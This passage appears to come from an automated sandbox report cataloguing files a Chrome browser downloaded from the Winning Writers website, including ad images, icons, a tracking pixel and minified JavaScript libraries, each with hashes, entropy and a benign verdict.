                                                                                                                                                                                            SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                            MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                            SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                            SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                            SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 970x250, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):114179
                                                                                                                                                                                            Entropy (8bit):7.971388753227462
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:N07cusc9Q5A1QOvX0IglFNUN5RQxRzCJ6QWb:ZcW5QvXBglFyNfw1CwQWb
                                                                                                                                                                                            MD5:846FBF2C62EFAF94925F30C7D1618E0D
                                                                                                                                                                                            SHA1:2DA7DD9A9E3A794A74C1E79D893C975815A99074
                                                                                                                                                                                            SHA-256:3CAF4F81F35E0BEA0F0D4855565E6C7575040D959144083E9721E51F743A032E
                                                                                                                                                                                            SHA-512:273BB6C64871B646E80AF6EC15A94F2CD5D5DD8B6EEA767D33A6F7B2C0481E30D71F5567D6BFD3ACB2F59DE5E0851DC252920DCB3AE0B655BD47D5B77724BF1E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/advertising/origin_story_banner_for_ww_2408.jpg
                                                                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Canva (Renderer)" xmpMM:InstanceID="xmp.iid:C9E87050520511EF8D2DB4E979BA17F8" xmpMM:DocumentID="xmp.did:C9E87051520511EF8D2DB4E979BA17F8"> <dc:creator> <rdf:Seq> <rdf:li>Adam Cohen</rdf:li> </rdf:Seq> </dc:creator> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">Origin Story Banner Ad (970 x 250 px) - 1</rdf:li> </rdf:Alt> </dc:title> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C9E8704E520511EF8D2DB4E979BA17F8" stRef:documentID="xmp.did:C9E8704F5205
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 970 x 250, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):99807
                                                                                                                                                                                            Entropy (8bit):7.992553042072697
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:/LYD3+t0KGWrLUocPn/3fhswK88Nke4oYytPnV8BSgNVYaqQrRdMxh3weHd7DUgM:j0eGWPxM3fhsu8SeHhVwSqIQQP9Ub
                                                                                                                                                                                            MD5:7FDBA925BC84EDB05452E9B8B1CFA382
                                                                                                                                                                                            SHA1:ACED710DAE45D156C2D26CE2D42F0F131E6A175A
                                                                                                                                                                                            SHA-256:447ECF69E0D3DAEDD79371AAA579F04BE23803493B98E321B33EEFA5D5D54BF0
                                                                                                                                                                                            SHA-512:B498CB4C6083187A0EE0CCEAFD1BBD8E62C2D35904DA66860D674EDF732EDA3D5DF3A717C7CE17D1ACB3FEF20263206D61518CDB7058531D4C8FE9B2A83A2A60
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/newsletter/best_free_contests_top_banner_2024.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............y.......pHYs..........+.....fiTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-10-27</Attrib:Created>. <Attrib:ExtId>1</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Best Free WW Top Banner 2024 - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>Adam Cohen</pdf:Author>. </rdf:Description>.. <rd
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4885), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4885
                                                                                                                                                                                            Entropy (8bit):5.819249689116001
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU/eEtytU7R9H:1DY0h8Rx47OIqWbZWeEtyK9H
                                                                                                                                                                                            MD5:A5059BBB048C83722395F773585C1093
                                                                                                                                                                                            SHA1:A34D3AB2E79D8AF31AA55FC3E7899812B309E8C2
                                                                                                                                                                                            SHA-256:66E481D422655768AE56D4A1265B3E657AB82097C10B336C07F6FFCB81106BF7
                                                                                                                                                                                            SHA-512:DEA7D9A7AABC822F21256744E6777FBB65FC2B9B0B89B193FE4BF8E07E98C6332E7BB3E1EA7415956846AEFAAF44F3325B5B7D2086292DC964DEFD62699A0A97
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                                            Entropy (8bit):2.9881439641616536
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                            MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                            SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                            SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                            SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://alb.reddit.com/rp.gif?ts=1731960007980&id=t2_11an1ubt&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=814805a2-007a-47c4-a129-ea0a72736646&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc=
                                                                                                                                                                                            Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):127513
                                                                                                                                                                                            Entropy (8bit):7.94674769468261
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:/y2jQElUb9hSJ3X6vmDOxwKqYy3nxtp1QRwZSVx6mmLp+:/y2jxwvmD4s3nxtp6RwwWN+
                                                                                                                                                                                            MD5:F8CD0839B17931931D9AC82F601AB60F
                                                                                                                                                                                            SHA1:67E118F6546C58B9F405E0FCFBB55CA1ACE4C1D9
                                                                                                                                                                                            SHA-256:88C614111612F40FD8D4078494E81A1344AE72FDA5F833644ED5EDCC3841F1F9
                                                                                                                                                                                            SHA-512:DE3753C4AAE9402D8EF53576B594CF8EA642D0A5C440F9E8843CC70A96F61CAC912BEDC586B34CCABFA51D8CD39A8AE4D8029DCFF4B4AC057BB1120406870955
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:E9B5A97E828611EF9F3CBEB41D1C8283" xmpMM:InstanceID="xmp.iid:E9B5A97D828611EF9F3CBEB41D1C8283" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:06cd94cf-5868-4632-86dc-94be07c287df" stRef:documentID="adobe:docid:photoshop:8684a329-6d2f-de46-8d94-3eb9001aee06"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1406
                                                                                                                                                                                            Entropy (8bit):3.5638569207444366
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:G9AjOxlYuttpe8ZXGqK3c+EvbGWhTfSc45Zoi6cNd8MF/9wZUO:E8OxlFy8ZwmTGWhY5ZoizNdvF/9K
                                                                                                                                                                                            MD5:FE4290984BB2D9DD650F095133E9550C
                                                                                                                                                                                            SHA1:293C2B0E8DD8628AAAB85D581AE260BD55833232
                                                                                                                                                                                            SHA-256:6780C449F752209540ADD333117DD0E8D64E11FEE963FD56BAE96A0AF1D0285C
                                                                                                                                                                                            SHA-512:28CC8E7560321B9A5FD2D2E63BFAC073B6BA8BDC11D1BF358B8796573A687DE8CBD325B9453A58A3B624CC744E59CD9A906651DBDE9F9EDF61F4F8523F12F683
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/winningwriters.ico
                                                                                                                                                                                            Preview:..............h.......(....... ...........@...........................;c.......1..l........K..........Sv......,U...?.._.......Hm......{...............%N...7......4_.......A..Bg..Zx..f...Mr..1Y..........&U.. L..............Qp......b.......g....E..=e..\{.......A...C.......G.......;.......3...9..'Q...X..Ss.......4......No..^~..c....A..l....E.......?..]}.......A...?...B...M..=d..@h......Ci.......3..#N...:...B...3...B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 44 x 152, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1362
                                                                                                                                                                                            Entropy (8bit):7.713273225741816
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:i0Y7YKsmirhmm6l5ukc5qeCD4S6/b5bv2l0lIm+LBtn8lFp5UMma:0/slA13uXkewQb5bvFz+D8L8Mma
                                                                                                                                                                                            MD5:783D4031FE50C3D83C960911E1FBC705
                                                                                                                                                                                            SHA1:17DF19F97628E77BE09C352BF27425FAEA248251
                                                                                                                                                                                            SHA-256:B9D6FDDB0988440902FCFC72F371ECFA80EE2EB36073F9EEBC17449EE41C886F
                                                                                                                                                                                            SHA-512:57DD3FC8C84DE71D97AB5E010FC522C893D7333E2E31C2E1037A0A88E2F0CA8CA836B86C453713C7A04D5900B014E36AC1E4B7723764E36A15929030968A1040
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/fancybox/fancybox_sprite.png
                                                                                                                                                                                            Preview:.PNG........IHDR...,............P....PLTE.............................................???...........................ggg............???.....ggg.............................................NNN...555.........zzz]]]hhh,,,..."""...AAAm....../tRNS........#'-:DHSU]iilmyz........................./......IDATx^.[s.L....C.....$.j)f..........M....X.7{....:=#..*.....:..R.I...$].t...F..L.....;..k.......7.......M.l.{A...2K.....>.+........a..j....n...(.....UZ....Dzhh...i...{...n....[...3....f..9f._..bM......TX......./.9.].$..jS.G6z.@v`..C...hR. ...,.0e..... ._p.)..uz.H..%.f..........._..s:.|u....%..R..M.-.Bo...Ad...gH/.)~....r.u.ds..S..(.Ze....Qw0...c..P.=...".[F.).m.1..I.H.iq..S....6..d..*sR..9v.m......\.$....RI..x...sl..I..i.=..-.l.V.pM..n.m.....y..B...8*.C5..._...r.......C._.M.m.$.|.,.l....O.(.....e...D}._L.i...R...@.do6~.Y..'.&..1.e.X6.U...P..O].-_0V;&6..w.Sz.......W..6..].T.G<.J1...x.X...cG.\... .^.....CF..G3.,]j~vN...c_..H......y..2<..h..+.U0R..>.....}..C93-
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4885), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4885
                                                                                                                                                                                            Entropy (8bit):5.817662939881749
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUleQtytU72:1DY0h8Rx47OIqWbZceQtyD
                                                                                                                                                                                            MD5:6600E9F9857C96282C431E95E0D92FA7
                                                                                                                                                                                            SHA1:F07C95DDD08C59931456A76ADD746AD7C71C97FD
                                                                                                                                                                                            SHA-256:3DAF08DBCED98DC6B016475C777A8C95E6548D3BA40E39850107CC7F56D934BD
                                                                                                                                                                                            SHA-512:9E4C9711638FE8E1FDA8A79142E5BE48B03007EA18503EF7460CCCA7C796B9761BEB269E1A6D9A855EE79F4ABC127D4B8EFA0FFF68637FC9FD73879BCAA3A7DA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 175 x 262, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):45587
                                                                                                                                                                                            Entropy (8bit):7.977356923988581
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:xjHklElUybngAEcjKTDXoG9t1wyUI8aLzvUeABB4sIiVGxeZRqri2dPVrU3G08JY:xjHgElBbgqsxjwyUTaLzv21VgeZRT6VQ
                                                                                                                                                                                            MD5:5AAC33B64B61DB404DC4C352B2FC35A4
                                                                                                                                                                                            SHA1:26D7847C1F38AF21AB5E71B440500B82C29AA8F1
                                                                                                                                                                                            SHA-256:0C116691E73C53871DE8BE89E7BD10501D6F145ACCDCB3D15A5BA0F5C8D234DC
                                                                                                                                                                                            SHA-512:95CC7C8DFAB1712970C4E5696B19CF30F89D02DAB6AF875BDC98D431ADF43BFC8917718F10901CCC739E91DE5031D75AAFCE674F4834535E3D5B7BA09CB4F802
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...piTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:0780117407206811808398A4089E17D8" xmpMM:DocumentID="xmp.did:AFB868D2320411E39611DEC0FE3DCF01" xmpMM:InstanceID="xmp.iid:B8ACDC7E31C411E39611DEC0FE3DCF01" xmp:CreatorTool="Adobe Photoshop Elements 10.0 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0980117407206811808398A4089E17D8" stRef:documentID="xmp.did:0780117407206811808398A4089E17D8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..D....9IDATx....NU...y.2WR2&c.Dx..gJQd..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.82213586131042
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU1eKawytU7L:1DY0h8Rx47OIqWbZkeKawyW
                                                                                                                                                                                            MD5:8D4F4AE46F54090A9F2CE9364628C778
                                                                                                                                                                                            SHA1:3E92A2947DCB833543AABCD7627C94F193D86B69
                                                                                                                                                                                            SHA-256:4F550D6482250CC9FF6A93747509924569075F70512E1EB1F9D82FB1D07B7E1B
                                                                                                                                                                                            SHA-512:7AA4D30D0619F52E001A0E4CFF18D8A8B8221E789F30DD4ED71A046722F24570B3351B8B4B162622810A806805357DD3A8A47F9B2E871A9681F921B6124D1C76
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 183 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4515
                                                                                                                                                                                            Entropy (8bit):7.948013480889057
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:z/GaEIEr+KlP5E5iSYhk2kOXirYnzBlHsjoDQk62eg2M+UJ:DGMEK+hgzYh/bXi8zj6oJ
                                                                                                                                                                                            MD5:2E9E69518483ACFDADF0FDA57A2868B2
                                                                                                                                                                                            SHA1:5C9FEEFB75545730D2C0E4591990C9950F61FD3A
                                                                                                                                                                                            SHA-256:FE40CA1C8A95F7A6B1DC5BFC689AB5CCD565C199CB0FAE15F207F9F2E53C2673
                                                                                                                                                                                            SHA-512:7D2C05F8D129CB3ACCE077CCF3D466800B5EEA07601680447821F308B00136834D150822D7476E327FCDBB121A3ED869D53A9E11FB610E78E4D9D709D2C3AFC6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/social-sprite-2020_new.png
                                                                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........(J....8IDAThC.[y.UE~...zE.AiT.E.i...a:@?.u#;....8....2Fi..d.x.N2:3.q.c.........`...fw.@....._...}u.=...k..9I>....{o.Z....WUO...6lXa^^.0).P%T.../...xa...IHk...o.~.Q..e..1.Kr..n.BC...J.A(C;.].......6.....#Ft....CQ_\.`.....iB|...jjnn>k._^....K<..M..nA.5J*.....5..6..K...O....Z..*.*L(.WA&Cn....Z.q..%d...z.. eJj%..r.u.....(.p..O..q.\....?..~..........x.Ik..HZ....;e(4.%.k.R@}*.\$.....s&...x.."4CH.=.o.IN....,.........9.r.T4..J....O-...&.....O..s1..4.I..s..W}../...%... s!1.K...WA....E8%7I......+((0.$=..O.t......&...1%.......hX4.C(..B..i.w..)TU.(...Eh.2....`/....T-n.....TDs....F......U...7).\...s...h..R.|..f.I.,...|.q....C.....Qg.6.zZGG..LRV.7^.....jYi.b`...3fL....%h..Y....C.ZUUU>.d...<.!6....,;.`..F...b.{.....N.M....].a...}=..-....w..I..zB>.dKl.V.v.....$64u..M`.?UZ..A7...S...Kz<._.c.1.N..d...Q....&..F..y..Q..I.LR.....G....a.)9G..-Fc..M...q..:t..{...~A.}.=..6./?.gq..)~
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1795)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2079
                                                                                                                                                                                            Entropy (8bit):5.225711130484111
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:+FPYH4WZW4dzDXxI5hppcYwNztDbNwF2Dc:WM44dvm5hY5GF2c
                                                                                                                                                                                            MD5:4BC31F2495D98D1A592DB1BCFEC0738B
                                                                                                                                                                                            SHA1:4A57B0E8FB4F30A8DF36179BACDC9CDB551E9A61
                                                                                                                                                                                            SHA-256:8B0DA118C94FD0DB4902EC1EA1981852FD3F33F6EBC231DD4D419400C0A323B2
                                                                                                                                                                                            SHA-512:ECCC9BB411B74DBA683D32B34814492813B57F266F8980BF7D5A3DA51E4CC8BEE430B7E939C39C6654E2DBBDB9A4FAE0C9D20E35E47FC071AC80F39925C254A6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*. * jQuery pageSlide. * Version 2.0. * http://srobbin.com/jquery-pageslide/. *. * jQuery Javascript plugin which slides a webpage over to reveal an additional interaction pane.. *. * Copyright (c) 2011 Scott Robbin (srobbin.com). * Dual licensed under the MIT and GPL licenses..*/.;(function(b){function j(e,a){if(0===e.indexOf("#"))b(e).clone(!0).appendTo(c.empty()).show();else{if(a){var d=b("<iframe />").attr({src:e,frameborder:0,hspace:0}).css({width:"100%",height:"100%"});c.html(d)}else c.load(e);c.data("localEl",!1)}}function k(b,a){var d=c.outerWidth(!0),f={},g={};if(!c.is(":visible")&&!h){h=!0;switch(b){case "left":c.css({left:"auto",right:"-"+d+"px"});f["margin-left"]="-="+d;g.right="+="+d;break;default:c.css({left:"-"+d+"px",right:"auto"}),f["margin-left"]="+="+d,g.left="+="+d}l.animate(f,a);c.show().animate(g,a,function(){h=!1})}}var l=b("body"),c=b("#pageslide"),h=!1,m;0==c.length&&(c=b("<div />").attr("id","pageslide").css("display","none").appendTo(b("body")));b.fn.pagesli
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1489)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1490
                                                                                                                                                                                            Entropy (8bit):5.121732802736398
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:T4mkXEbajLeYDDjHuZXs14rigeWCF770cI13xlkTNFK+kTIT1sXINKpIJ71ITxn:cpWwLeYDAedF77+uHK+uIT1tKpOixn
                                                                                                                                                                                            MD5:E7AC890B1E97A9765AEC1DBBD53111E9
                                                                                                                                                                                            SHA1:54940DEE666A0CE2532974C0603C29E976F82622
                                                                                                                                                                                            SHA-256:B8C3232F67640F0036C0869239C6C5D54A0E9D7C34F1149352095AF48BFB2553
                                                                                                                                                                                            SHA-512:CF9368DCD87CACC28DEAFD8D22668F730FF8847A41AC13E8D8666419B2CC759F45E3CDFB80AF161320E377A782378B273DF28133D4754C621C53FDEB656575BC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/jquery-ck.js
